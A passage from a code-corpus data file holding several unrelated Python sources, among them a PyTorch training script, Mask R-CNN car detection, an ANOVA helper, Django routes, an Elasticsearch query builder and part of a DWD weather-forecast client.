0:\r\n\r\n # save the checkpoint\r\n model_path = os.path.join(opt['output_dir'],\r\n '{}_{}.pth'\r\n .format(opt['output_dir'].split('/')[-1], epoch))\r\n\r\n if torch.__version__ == '1.3.1':\r\n torch.save(model.state_dict(), model_path)\r\n else:\r\n torch.save(model.state_dict(), model_path, _use_new_zipfile_serialization=False)\r\n\r\n print('model saved to %s' % model_path)\r\n with open(opt['model_info_path'], 'a') as f:\r\n f.write('model_%d, cap_loss: %.6f, cms_int_train_loss = %.6f, cms_eff_train_loss = %.6f, cms_att_train_loss = %.6f,'\r\n 'cap_acc = %.3f, cms_int_acc = %.3f, cms_eff_acc = %.3f, cms_att_acc = %.3f\\n'\r\n % (epoch, cap_train_loss_total / iteration, cms_int_train_loss_total / iteration, cms_eff_train_loss_total / iteration, cms_att_train_loss_total / iteration,\r\n cap_n_correct_total/n_word_total, cms_int_n_correct_total/cms_int_n_word_total, cms_eff_n_correct_total/cms_eff_n_word_total, cms_att_n_correct_total/cms_att_n_word_total))\r\n\r\n\r\ndef main(opt):\r\n # load and define dataloader\r\n dataset = VideoDataset(opt, 'train')\r\n dataloader = DataLoader(dataset, batch_size=opt['batch_size'], shuffle=True)\r\n\r\n opt['cms_vocab_size'] = dataset.get_cms_vocab_size()\r\n opt['cap_vocab_size'] = dataset.get_cap_vocab_size()\r\n\r\n\r\n cms_int_text_length = opt['int_max_len']\r\n cms_eff_text_length = opt['eff_max_len']\r\n cms_att_text_length = opt['att_max_len']\r\n\r\n # model initialization.\r\n model = Model(\r\n dataset.get_cap_vocab_size(),\r\n dataset.get_cms_vocab_size(),\r\n cap_max_seq=opt['cap_max_len'],\r\n cms_max_seq_int=cms_int_text_length,\r\n cms_max_seq_eff=cms_eff_text_length,\r\n cms_max_seq_att=cms_att_text_length,\r\n tgt_emb_prj_weight_sharing=False,\r\n vis_emb=opt['dim_vis_feat'],\r\n rnn_layers=opt['rnn_layer'],\r\n d_k=opt['dim_head'],\r\n d_v=opt['dim_head'],\r\n d_model=opt['dim_model'],\r\n d_word_vec=opt['dim_word'],\r\n d_inner=opt['dim_inner'],\r\n n_layers=opt['num_layer'],\r\n n_head=opt['num_head'],\r\n dropout=opt['dropout'])\r\n\r\n # number of parameters\r\n model_parameters = filter(lambda p: p.requires_grad, model.parameters())\r\n params = sum([np.prod(p.size()) for p in model_parameters])\r\n print('number of learnable parameters are {}'.format(params))\r\n\r\n if opt['cuda']: model = model.cuda()\r\n\r\n # resume from previous checkpoint if indicated\r\n if opt['load_checkpoint'] and opt['resume']:\r\n cap_state_dict = torch.load(opt['load_checkpoint'])\r\n model_dict 
= model.state_dict()\r\n model_dict.update(cap_state_dict)\r\n model.load_state_dict(model_dict)\r\n\r\n optimizer = ScheduledOptim(optim.Adam(filter(lambda x: x.requires_grad, model.parameters()),\r\n betas=(0.9, 0.98), eps=1e-09), 512, opt['warm_up_steps'])\r\n\r\n # note: though we set the init learning rate as np.power(d_model, -0.5),\r\n # grid search indicates different LR may improve the results.\r\n opt['init_lr'] = round(optimizer.init_lr, 3)\r\n\r\n # create checkpoint output directory\r\n dir = opt['output_dir']\r\n if not os.path.exists(dir): os.makedirs(dir)\r\n\r\n # save the model snapshot to local\r\n info_path = os.path.join(dir, 'iteration_info_log.log')\r\n print('model architecture saved to {} \\n {}'.format(info_path, str(model)))\r\n with open(info_path, 'a') as f:\r\n f.write(str(model))\r\n f.write('\\n')\r\n f.write(str(params))\r\n f.write('\\n')\r\n\r\n # log file directory\r\n opt['info_path'] = info_path\r\n opt['model_info_path'] = os.path.join(opt['output_dir'],\r\n 'checkpoint_loss_log.log')\r\n\r\n train(dataloader, model, optimizer, opt, dataset.get_cap_vocab(), dataset.get_cms_vocab())\r\n\r\nif __name__ == '__main__':\r\n opt = parse_opt()\r\n opt = vars(opt)\r\n main(opt)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"205266941","text":"import os\nimport sys\nimport skimage.io\nimport matplotlib.pyplot as plt\nimport argparse\n\nsys.path.append(\"cnn\")\nsys.path.append(\"cnn/mrcnn\")\n\nfrom Mask_RCNN import car_detection_train\nimport model as modellib\nimport visualize\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\n\nimport cv2\nfrom keras.preprocessing import image\nfrom moviepy.editor import VideoFileClip\nimport visualize_car_detection\n\n\ndef configure():\n # Root directory of the project\n ROOT_DIR = \"./\"\n MODEL_DIR = 'model/'\n MY_MODEL_PATH = MODEL_DIR + 'mask_rcnn_car_0030.h5'\n IMAGE_DIR = os.path.join('Mask_RCNN', \"images\")\n\n config = ConfigProto()\n config.gpu_options.allow_growth = True\n session = InteractiveSession(config=config)\n\n class InferenceConfig(car_detection_train.BalloonConfig):\n # Set batch size to 1 since we'll be running inference on\n # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n DETECTION_MIN_CONFIDENCE = 0.6\n\n config = InferenceConfig()\n config.display()\n model = modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=config)\n model.load_weights(MY_MODEL_PATH, by_name=True)\n # class_names = ['bg', ' ']\n\n return model\n\n\ndef detect_cars(img_name):\n # img = 'dataset/train/1.jpg'\n image = skimage.io.imread(img_name)\n results = model.detect([image], verbose=0)\n r = results[0]\n visualize.display_instances(image, r['rois'], r['masks'], r['class_ids'],\n class_names, colors= [(0.2, 0.2, 0.95)]*100, figsize=(12, 12))\n\n\ndef convert2output(header, box):\n output = ''\n for i in box:\n output += str(header) + ',' + '-1,';\n for j in i:\n output += str(j) + ','\n output += '-1,-1,-1\\n'\n return output\n\nclass_names = ['bg', ' ']\n\nresults_sequence = ''\nheader = 0\n\ndef process_video(input_img):\n global results_sequence\n global header\n global model\n header += 1\n # img = cv2.resize(input_img, (1024, 1024))\n # img = image.img_to_array(img)\n results = model.detect([input_img], verbose=0)\n r = results[0]\n final_img = visualize_car_detection.display_instances2(input_img, r['rois'], r['masks'], r['class_ids'],\n class_names, r['scores'])\n\n plt.imshow(final_img)\n plt.show()\n results_sequence += convert2output(header, r['rois'])\n return final_img\n\ndef parseArgs():\n \"\"\"Parse input arguments.\"\"\"\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('integer', type=int)\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n model = configure()\n output = 'output.mp4'\n # get the duration of output video\n params = parseArgs()\n if params:\n duration = params.integer\n else:\n duration = .5\n clip1 = VideoFileClip(\"aic19-track3-train-data/72.mp4\")\n # this function can reduce frames in the video\n # in the demo, we just use 5s duration of the video and two fold faster\n newclip = clip1.fl_time(lambda t: 2*t).set_duration(duration)\n clip = newclip.fl_image(lambda image: process_video(image))\n clip.write_videofile(output, audio=False)\n\n # output the box positions (SORT: tracks these boxes)\n #print(results_sequence)\n with open(\"carBoxesOutput.txt\", \"w\") as fp:\n fp.write(results_sequence)\n\n\n","sub_path":"infer_car_in_video.py","file_name":"infer_car_in_video.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"414396570","text":"import numpy as np\n\ndata = [(0., 0., 0.),\n (0., 0.5, 0.),\n (0., 1., 0.),\n (0.5, 0., 0.5),\n (0.5, 0.5, 0.5),\n (0.5, 1., 0.5),\n (1., 0., 1.),\n (1., 0.5, 1.),\n (1., 1., 1.)]\n\nalpha = 10\n\nW1 = alpha * np.array([[1., 0.], [0., 1.]])\nW2 = alpha * np.array([[0.1, 0.], [0., 1.]])\nW3 = alpha * np.array([[1., 0.], [0., 0.1]])\n\n\n# def mahalanobis(a,d):\n\n\ndef kernel(x, x_prime, W):\n # a and b are 2d vectors stored in a np array\n z = x - x_prime\n ztwz = (z.T)@(W@z)\n distance = np.exp(-1*ztwz)\n return distance\n\ndef kernelized_regression(test_x, W, alt_data):\n\n top_list =[]\n bottom_list = []\n for value in alt_data:\n # current x and y values\n x_n = np.array([value[0], value[1]])\n y_n = value[2]\n # Use our mahalanobis distance kernel to gauge distance to other x vals\n distance = kernel(test_x, x_n, W)\n # add the \n top_list.append(distance*y_n)\n bottom_list.append(distance)\n\n y_hat = sum(top_list)/sum(bottom_list)\n\n return y_hat\n\ndef compute_loss(W):\n\n # losses for each y:\n losses = []\n for i, value in enumerate(data):\n \n # Maybe only search over data not including the test case?\n alt_data = data[:i] + data[i+1:]\n\n y = value[2]\n # construct a 2d vector for each set of x1 and x2 set of values\n test_x = np.array([value[0], value[1]])\n # This is the predicted y value given the above x vector\n y_hat = kernelized_regression(test_x, W, alt_data)\n # Ths is the residual comparing the predicted y value with the actual y value\n residual = y - y_hat\n # Add square the residual and add it to the loss list\n losses.append(pow((residual), 2))\n \n # Sum the loss list and scale by 1/2\n loss = sum(losses)\n return loss\n\n# Need to remove the x_star from the test set\n\n\nprint(compute_loss(W1))\nprint(compute_loss(W2))\nprint(compute_loss(W3))","sub_path":"hw1/T1_P1.py","file_name":"T1_P1.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"155201977","text":"# -*- coding: utf-8 -*-\n\n#\n# Authors: Tomi Jylhä-Ollila, Finland 2013-2016\n# Toni Ruottu, Finland 2013-2014\n#\n# This file is part of Kunquat.\n#\n# CC0 1.0 Universal, http://creativecommons.org/publicdomain/zero/1.0/\n#\n# To the extent possible under law, Kunquat Affirmers have waived all\n# copyright and related or neighboring rights to Kunquat.\n#\n\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\n\nimport kunquat.tracker.cmdline as cmdline\nfrom .composition import Composition\nfrom .typewriterpanel import TypewriterPanel\n\n\nclass MainSplitter(QSplitter):\n\n def __init__(self):\n super().__init__()\n self._ui_model = None\n self.setOrientation(Qt.Vertical)\n self._composition = Composition()\n self._typewriter_panel = TypewriterPanel()\n\n v = QVBoxLayout()\n v.setContentsMargins(0, 0, 0, 0)\n v.setSpacing(0)\n v.addWidget(self._composition)\n v.addWidget(self._typewriter_panel)\n self.setLayout(v)\n\n def set_ui_model(self, ui_model):\n self._ui_model = ui_model\n self._composition.set_ui_model(ui_model)\n self._typewriter_panel.set_ui_model(ui_model)\n\n def unregister_updaters(self):\n self._typewriter_panel.unregister_updaters()\n self._composition.unregister_updaters()\n\n","sub_path":"kunquat/tracker/ui/views/mainsplitter.py","file_name":"mainsplitter.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"389651430","text":"import pandas as pd\nimport numpy as np\nimport os\nimport scipy.stats as stats\n\n\ndef rmANOVA(df):\n '''\n My attempt at a repeated-measures ANOVA \n In:\n data: dataframe\n\n Out:\n x: symmetric matrix of f-statistics\n **coming soon** p: p-values for each element of x\n '''\n\n stats_dict = dict()\n for dset in df['dataset'].unique():\n alg_list = []\n for alg in df['pipeline'].unique():\n alg_list.append(df[np.logical_and(\n df['dataset'] == dset, df['pipeline'] == alg)]['score'].as_matrix())\n alg_list = [a for a in alg_list if len(a) > 0] #some datasets and algorithms may not exist?\n M = np.stack(alg_list).T\n stats_dict[dset] = _rmanova(M)\n return stats_dict\n\n\ndef _rmanova(matrix):\n mean_subj = matrix.mean(axis=1)\n mean_algo = matrix.mean(axis=0)\n grand_mean = matrix[:].mean()\n\n # SS: sum of squared difference\n SS_algo = len(mean_subj) * np.sum((mean_algo - grand_mean)**2)\n SS_within_subj = np.sum((matrix - mean_algo[np.newaxis, :])**2)\n SS_subject = len(mean_algo) * np.sum((mean_subj - grand_mean)**2)\n SS_error = SS_within_subj - SS_subject\n\n # MS: Mean of squared difference\n MS_algo = SS_algo / (len(mean_algo) - 1)\n MS_error = SS_error / ((len(mean_algo) - 1)*(len(mean_subj) - 1))\n\n # F-statistics\n f = MS_algo/MS_error\n n, k = matrix.shape\n df1 = k-1\n df2 = (k-1)*(n-1) # calculated as one-way repeated-measures ANOVA\n p = stats.f.sf(f, df1, df2)\n return f, p\n","sub_path":"moabb/analysis/meta_analysis.py","file_name":"meta_analysis.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"622169955","text":"from django.conf.urls import url\nfrom . import views\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^library/', views.library),\n url(r'^grade/', views.grade),\n url(r'^internet/', views.internet),\n url(r'^cartoon/', views.cartoon),\n url(r'^fp_growth/',views.fp_growth),\n url(r'^update11/', views.update11),\n url(r'^update12/', views.update12),\n url(r'^update13/', views.update13),\n url(r'^update14/', views.update14),\n url(r'^update15/', views.update15),\n\n url(r'^update21/', views.update21),\n url(r'^update22/', views.update22),\n\n #插入假数据函数\n url(r'^student_info_insert/', views.student_info_insert),\n url(r'^library_insert/', views.library_insert),\n url(r'^grade_insert/', views.grade_insert),\n url(r'^internet_insert/', views.internet_insert),\n url(r'^cartoon_insert/', views.cartoon_insert),\n url(r'^award_insert/', views.award_insert),\n\n\n]","sub_path":"student/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"412032896","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/scripy/_path.py\n# Compiled at: 2010-02-16 08:08:48\n\"\"\"Absolute path of files.\"\"\"\n\nclass Bin(object):\n \"\"\"Avoid possible trojans into executables from a modified *PATH*.\"\"\"\n chown = '/bin/chown'\n cp = '/bin/cp'\n grep = '/bin/grep'\n ls = '/bin/ls'\n readlink = '/bin/readlink'\n sed = '/bin/sed'\n modprobe = '/sbin/modprobe'\n apt_get = '/usr/bin/apt-get'\n diff = '/usr/bin/diff'\n find = '/usr/bin/find'\n stat = '/usr/bin/stat'\n sudo = '/usr/bin/sudo'","sub_path":"pycfiles/Scripy-0.9.3-py2.6/_path.py","file_name":"_path.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"100136265","text":"# coding=UTF-8\n# author=suemi\n# created at 16/5/13\nimport requests\nfrom elasticsearch import Elasticsearch\nfrom utils import Constants\n\n\nclass QueryBuilder(object):\n \"\"\"\n 从用户输入中生成符合ES要求的请求体并解析ES返回的响应\n \"\"\"\n\n address = Constants.ES_SETTINGS['host'] + ':' + str(Constants.ES_SETTINGS['port'])\n es = {address: Elasticsearch([address])}\n\n def __init__(self,\n indexName=Constants.INDEX_NAME,\n indexType=Constants.INDEX_TYPE):\n self.indexName = indexName\n self.indexType = indexType\n self.toCluster = False\n self.start = 0\n self.size = None\n self.sortBy = ['_score']\n self.matchFields = {}\n self.word = None\n self.clusterAlgorithm = 'lingo'\n self.address = self.__class__.address\n\n @staticmethod\n def instance(indexName=Constants.INDEX_NAME,\n indexType=Constants.INDEX_TYPE):\n return QueryBuilder(indexName, indexType)\n\n def connect(self):\n \"\"\"\n :return:获取ES连接实例\n \"\"\"\n tmp = self.__class__.es\n if not tmp.has_key(self.address):\n tmp[self.address] = Elasticsearch([self.address])\n return tmp.get(self.address)\n\n def specify(self,\n indexName=Constants.INDEX_NAME,\n indexType=Constants.INDEX_TYPE):\n \"\"\"\n 指定索引名和索引类型\n :param indexName:\n :param indexType:\n :return:\n \"\"\"\n self.indexName = indexName\n self.indexType = indexType\n return self\n\n def term(self, word, field='_all'):\n \"\"\"\n 添加查询词\n :param word:\n :param field:\n :return:\n \"\"\"\n self.matchFields[field] = word\n self.word = word\n return self\n\n def locate(self, host, port=9200):\n \"\"\"\n 修改服务器地址\n :param host:\n :param port:\n :return:\n \"\"\"\n self.address = host + ':' + str(port)\n return self\n\n def cluster(self, toCluster):\n \"\"\"\n 设定是否需要对搜索结果聚类\n :param toCluster:\n :return:\n \"\"\"\n self.toCluster = toCluster\n return self\n\n def algorithm(self, clusterAlgorithm):\n \"\"\"\n 设定聚类算法\n :param clusterAlgorithm:\n :return:\n \"\"\"\n if clusterAlgorithm in ['lingo', 'stc', 'kmeans', 'byurl']:\n self.clusterAlgorithm = clusterAlgorithm\n return self\n\n def limit(self, size):\n \"\"\"\n 返回返回结果上限\n :param size:\n :return:\n \"\"\"\n self.size = size\n return self\n\n def sort(self, sortItem):\n \"\"\"\n 设定返回文档的排序策略\n :param sortItem:\n :return:\n \"\"\"\n tmp = sortItem.split(':')\n if len(tmp) == 1:\n self.sortBy.insert(-1, tmp[0])\n elif len(tmp) == 2:\n self.sortBy.insert(-1, {tmp[0]: {'order': tmp[1]}})\n else:\n raise ValueError\n return self\n\n def cursor(self, start):\n \"\"\"\n 指定返回文档的起始位置,便于分页\n :param start:\n :return:\n \"\"\"\n self.start = start\n return self\n\n def submit(self, document):\n \"\"\"\n 提交一个文档\n :param document:\n :return:\n \"\"\"\n return self.connect().index(self.indexName, self.indexType, document.toDict(), id=document.documentId())\n\n def delete(self, document):\n \"\"\"\n 删除一个文档\n :param document:\n :return:\n \"\"\"\n return self.connect().delete(self.indexName, self.indexType, document.documentId())\n\n def persist(self, document, delta=None):\n \"\"\"\n 更新或插入一个文档\n :param document:\n :param delta:\n :return:\n \"\"\"\n if self.connect().exists(self.indexName, self.indexType, document.documentId()):\n return self.connect().update(self.indexName, self.indexType, document.documentId(),\n document.toDict() if delta is None else delta)\n else:\n return self.submit(document)\n\n def load(self, documentId):\n \"\"\"\n 根据Id获取文档\n :param documentId:\n :return:\n \"\"\"\n return self.connect().get_source(self.indexName, self.indexType, documentId)\n\n # def query(self):\n # \"\"\"\n # 使用Pyes提供的Python API来查询\n 
# :return:\n # \"\"\"\n #\n # if not self.toCluster:\n # if len(self.matchFields) == 0:\n # # generate_model(self.indexName,self.indexType).objects.filter\n # q = MatchAllQuery()\n # else:\n # item = self.matchFields.items()[-1]\n # q = MatchQuery(item[0], item[1])\n # q = Search(q, start=self.start, size=self.size)\n # sortBy = ''\n # for item in self.sortBy:\n # if isinstance(item, str):\n # sortBy += item + ','\n # elif isinstance(item, dict):\n # tmp = item.popitem()\n # sortBy += tmp[0]\n # sortBy += ':' + tmp[1]['order']\n # sortBy += ','\n # sortBy = sortBy[:-1] if len(sortBy) > 0 else sortBy\n # response = self.connect().search(q, indexes=[self.indexName], sort=sortBy)\n # items = [item for item in response]\n # orignal = response._results\n # for i in range(len(items)):\n # tmp = dict.fromkeys(items[i].keys(), '')\n # for key in tmp.keys():\n # tmp[key] = items[i][key]\n # orignal['hits']['hits'][i]['_source'] = tmp\n #\n # return self.parseResult(orignal)\n # else:\n # return self.rawQuery()\n\n def query(self):\n \"\"\"\n 直接使用ES的Restful请求来查询\n :return:\n \"\"\"\n query = {'match_all': {}} if len(self.matchFields) == 0 else {\n 'match': self.matchFields\n }\n searchRequest = {\n 'query': query,\n \"sort\": self.sortBy,\n 'from': self.start,\n 'highlight': {\n 'pre_tags': [''],\n 'post_tags': [' '],\n # 此处非常重要,由于我们设置的查找域基本为_all,不设置的话就会导致任一域都不高亮\n 'require_field_match': False,\n 'fields': {\n 'title': {\n # 'type': 'fvh', 去掉注释返回高亮的偏移位置\n 'fragment_size': '20',\n \"number_of_fragments\": 1\n\n },\n 'content': {\n # 'type': 'fvh',\n 'fragment_size': '100',\n \"number_of_fragments\": 3\n }\n }\n }\n }\n if self.size is not None:\n searchRequest['size'] = self.size\n\n url = 'http://' + self.address + '/' + self.indexName + '/' + self.indexType\n if self.toCluster:\n requestBody = {\n 'search_request': searchRequest,\n 'query_hint': self.word,\n 'field_mapping': {\n 'title': ['_source.title'],\n 'content': ['_source.content'],\n 'lang': ['_source.lang']\n },\n 'algorithm': self.clusterAlgorithm,\n }\n url += '/_search_with_clusters'\n response = requests.post(url, json=requestBody).json()\n else:\n url += '/_search'\n response = self.connect().search(index=self.indexName, doc_type=self.indexType, body=searchRequest)\n return self.parseResult(response)\n\n def parseResult(self, response):\n \"\"\"\n 解析ES返回的结果\n :param response:\n :return:\n \"\"\"\n\n result = {\n 'abstract': {},\n 'documents': [],\n 'detail': {},\n 'success': True\n }\n if response.has_key('error'):\n result['success'] = False\n result['cause'] = response['error']['root_cause']\n return result\n\n hits = response.get('hits', {\n 'total': 0,\n 'max_score': 0,\n 'hits': []\n })\n result['abstract']['total'] = hits['total']\n result['abstract']['max_score'] = hits['max_score']\n id2index = {}\n for i in range(len(hits['hits'])):\n hit = hits['hits'][i]\n tmp = hit['_source']\n tmp['_score'] = hit['_score']\n tmp['_id'] = hit['_id']\n tmp['highlight'] = hit.get(\"highlight\", {})\n result['documents'].append(tmp)\n id2index[hit['_id']] = i\n\n if self.toCluster:\n clusters = response.get('clusters', [])\n result['abstract']['cluster_num'] = len(clusters)\n result['detail']['clusters'] = clusters\n for cluster in clusters:\n for documentId in cluster['documents']:\n position = id2index[documentId]\n document = result['documents'][position]\n document['label'] = cluster['label']\n\n return 
result\n","sub_path":"utils/QueryBuilder.py","file_name":"QueryBuilder.py","file_ext":"py","file_size_in_byte":9490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"49426379","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2018-2021, earthobservations developers.\n# Distributed under the MIT License. See LICENSE for more info.\nimport logging\nfrom datetime import datetime\nfrom enum import Enum\nfrom io import StringIO\nfrom typing import Dict, Generator, Optional, Tuple, Union\nfrom urllib.parse import urljoin\n\nimport numpy as np\nimport pandas as pd\nimport requests\nfrom requests import HTTPError\n\nfrom wetterdienst.core.scalar.request import ScalarRequestCore\nfrom wetterdienst.core.scalar.result import StationsResult, ValuesResult\nfrom wetterdienst.core.scalar.values import ScalarValuesCore\nfrom wetterdienst.exceptions import InvalidParameter\nfrom wetterdienst.metadata.columns import Columns\nfrom wetterdienst.metadata.datarange import DataRange\nfrom wetterdienst.metadata.kind import Kind\nfrom wetterdienst.metadata.period import Period, PeriodType\nfrom wetterdienst.metadata.provider import Provider\nfrom wetterdienst.metadata.resolution import Resolution, ResolutionType\nfrom wetterdienst.metadata.timezone import Timezone\nfrom wetterdienst.provider.dwd.forecast.access import KMLReader\nfrom wetterdienst.provider.dwd.forecast.metadata import (\n DwdForecastDate,\n DwdMosmixParameter,\n DwdMosmixType,\n)\nfrom wetterdienst.provider.dwd.forecast.metadata.field_types import INTEGER_PARAMETERS\nfrom wetterdienst.provider.dwd.forecast.metadata.unit import DwdMosmixUnit\nfrom wetterdienst.provider.dwd.metadata.column_names import DwdColumns\nfrom wetterdienst.provider.dwd.metadata.constants import (\n DWD_MOSMIX_L_SINGLE_PATH,\n DWD_MOSMIX_S_PATH,\n DWD_SERVER,\n)\nfrom wetterdienst.provider.dwd.metadata.datetime import DatetimeFormat\nfrom wetterdienst.util.cache import metaindex_cache\nfrom wetterdienst.util.enumeration import parse_enumeration_from_template\nfrom wetterdienst.util.geo import convert_dm_to_dd\nfrom wetterdienst.util.network import list_remote_files_fsspec\n\nlog = logging.getLogger(__name__)\n\n\nclass DwdMosmixDataset(Enum):\n SMALL = \"small\"\n LARGE = \"large\"\n\n\nclass DwdMosmixValues(ScalarValuesCore):\n \"\"\"\n Fetch weather forecast data (KML/MOSMIX_S dataset).\n\n Parameters\n ----------\n station_id : List\n - If None, data for all stations is returned.\n - If not None, station_ids are a list of station ids for which data is desired.\n\n parameter: List\n - If None, data for all parameters is returned.\n - If not None, list of parameters, per MOSMIX definition, see\n https://www.dwd.de/DE/leistungen/opendata/help/schluessel_datenformate/kml/mosmix_elemente_pdf.pdf?__blob=publicationFile&v=2 # noqa:E501,B950\n \"\"\"\n\n _tz = Timezone.GERMANY\n _data_tz = Timezone.UTC\n _has_quality = False\n\n _irregular_parameters = tuple()\n _integer_parameters = INTEGER_PARAMETERS\n _string_parameters = tuple()\n\n def _create_humanized_parameters_mapping(self) -> Dict[str, str]:\n \"\"\"Method for creation of parameter name mappings based on\n self._parameter_base\"\"\"\n hcnm = {\n parameter.value: parameter.name.lower()\n for parameter in self.stations.stations._parameter_base[\n self.stations.stations.mosmix_type.name\n ]\n }\n\n return hcnm\n\n def __init__(self, stations: StationsResult) -> None:\n \"\"\"\"\"\"\n super(DwdMosmixValues, self).__init__(stations=stations)\n\n parameter_base = self.stations.stations._parameter_base\n dataset_accessor = self.stations.stations._dataset_accessor\n\n parameter_ = []\n for parameter, dataset in self.stations.parameter:\n if parameter == dataset:\n parameter = 
[par.value for par in parameter_base[dataset_accessor]]\n                parameter_.extend(parameter)\n            else:\n                parameter_.append(parameter.value)\n\n        self.kml = KMLReader(\n            station_ids=self.stations.station_id.tolist(),\n            parameters=parameter_,\n        )\n\n    # TODO: add __eq__ and __str__\n\n    @property\n    def metadata(self) -> pd.DataFrame:\n        \"\"\"\n        Wrapper for forecast metadata\n\n        :return:\n        \"\"\"\n        return self.stations.df\n\n    def query(self) -> Generator[ValuesResult, None, None]:\n        \"\"\"\n        Replaces the collect data method, as all information is read once from the kml file\n\n        :return:\n        \"\"\"\n        for df in self._collect_station_parameter():\n            df = self._coerce_parameter_types(df)\n\n            if self.stations.stations.tidy:\n                df = self.tidy_up_df(df, self.stations.stations.mosmix_type)\n\n            # df = self._tidy_up_df(df)\n\n            # df[\n            #     Columns.DATASET.value\n            # ] = self.stations.stations.mosmix_type.value.lower()\n            # df[Columns.VALUE.value] = pd.to_numeric(\n            #     df[Columns.VALUE.value], errors=\"coerce\"\n            # ).astype(float)\n\n            df = self._coerce_meta_fields(df)\n\n            if self.stations.humanize:\n                df = self._humanize(df)\n\n            df = self._organize_df_columns(df)\n\n            result = ValuesResult(stations=self.stations, df=df)\n\n            yield result\n\n    def _collect_station_parameter(self) -> Generator[pd.DataFrame, None, None]:\n        \"\"\"\n        Wrapper of read_mosmix to collect forecast data (either latest or for\n        defined dates)\n\n        :return:\n        \"\"\"\n        if self.stations.start_issue == DwdForecastDate.LATEST:\n            for df in self.read_mosmix(self.stations.stations.start_issue):\n                yield df\n        else:\n            for date in pd.date_range(\n                self.stations.stations.start_issue,\n                self.stations.stations.end_issue,\n                freq=self.stations.frequency.value,\n            ):\n                try:\n                    for df in self.read_mosmix(date):\n                        yield df\n                except IndexError as e:\n                    log.warning(e)\n                    continue\n\n    def _tidy_up_df(self, df: pd.DataFrame, dataset) -> pd.DataFrame:\n        \"\"\"\n\n        :param df:\n        :return:\n        \"\"\"\n        df_tidy = df.melt(\n            id_vars=[\n                Columns.STATION_ID.value,\n                Columns.DATE.value,\n            ],\n            var_name=DwdColumns.PARAMETER.value,\n            value_name=DwdColumns.VALUE.value,\n        )\n\n        # add the quality column to the melted frame that is actually returned\n        df_tidy[Columns.QUALITY.value] = np.nan\n\n        df_tidy[Columns.QUALITY.value] = df_tidy[Columns.QUALITY.value].astype(float)\n\n        return df_tidy\n\n    def read_mosmix(\n        self, date: Union[datetime, DwdForecastDate]\n    ) -> Generator[pd.DataFrame, None, None]:\n        \"\"\"\n        Manage data acquisition for a given date that is used to filter the found files\n        on the MOSMIX path of the DWD server.\n\n        :param date: datetime or enumeration for latest MOSMIX forecast\n        :return: DWDMosmixResult with gathered information\n        \"\"\"\n        for df_forecast in self._read_mosmix(date):\n            df_forecast = df_forecast.rename(\n                columns={\n                    \"station_id\": DwdColumns.STATION_ID.value,\n                    \"datetime\": DwdColumns.DATE.value,\n                }\n            )\n\n            yield df_forecast\n\n    def _read_mosmix(\n        self, date: Union[DwdForecastDate, datetime]\n    ) -> Generator[pd.DataFrame, None, None]:\n        \"\"\"\n        Wrapper that either calls read_mosmix_s or read_mosmix_l depending on\n        defined period type\n\n        :param date:\n        :return:\n        \"\"\"\n        if self.stations.stations.mosmix_type == DwdMosmixType.SMALL:\n            yield from self.read_mosmix_small(date)\n        else:\n            yield from self.read_mosmix_large(date)\n\n    def read_mosmix_small(\n        self, date: Union[DwdForecastDate, datetime]\n    ) -> Generator[Tuple[pd.DataFrame, pd.DataFrame], None, None]:\n        \"\"\"\n        Reads single MOSMIX-S file with all stations and returns every forecast that\n        matches with one of the defined station ids.\n\n        :param date:\n        :return:\n        \"\"\"\n        url = urljoin(DWD_SERVER, 
DWD_MOSMIX_S_PATH)\n\n file_url = self.get_url_for_date(url, date)\n\n self.kml.read(file_url)\n\n for forecast in self.kml.get_forecasts():\n yield forecast\n\n def read_mosmix_large(\n self, date: Union[DwdForecastDate, datetime]\n ) -> Generator[Tuple[pd.DataFrame, pd.DataFrame], None, None]:\n \"\"\"\n Reads multiple MOSMIX-L files with one per each station and returns a\n forecast per file.\n\n :param date:\n :return:\n \"\"\"\n url = urljoin(DWD_SERVER, DWD_MOSMIX_L_SINGLE_PATH)\n\n for station_id in self.stations.station_id:\n station_url = f\"{url}{station_id}/kml\"\n\n try:\n file_url = self.get_url_for_date(station_url, date)\n except HTTPError:\n log.warning(f\"Files for {station_id} do not exist on the server\")\n continue\n\n self.kml.read(file_url)\n\n yield next(self.kml.get_forecasts())\n\n @staticmethod\n def get_url_for_date(url: str, date: Union[datetime, DwdForecastDate]) -> str:\n \"\"\"\n Method to get a file url based on the MOSMIX-S/MOSMIX-L url and the date that is\n used for filtering.\n\n :param url: MOSMIX-S/MOSMIX-L path on the dwd server\n :param date: date used for filtering of the available files\n :return: file url based on the filtering\n \"\"\"\n urls = list_remote_files_fsspec(url, recursive=False)\n\n if date == DwdForecastDate.LATEST:\n try:\n url = list(filter(lambda url_: \"LATEST\" in url_.upper(), urls))[0]\n return 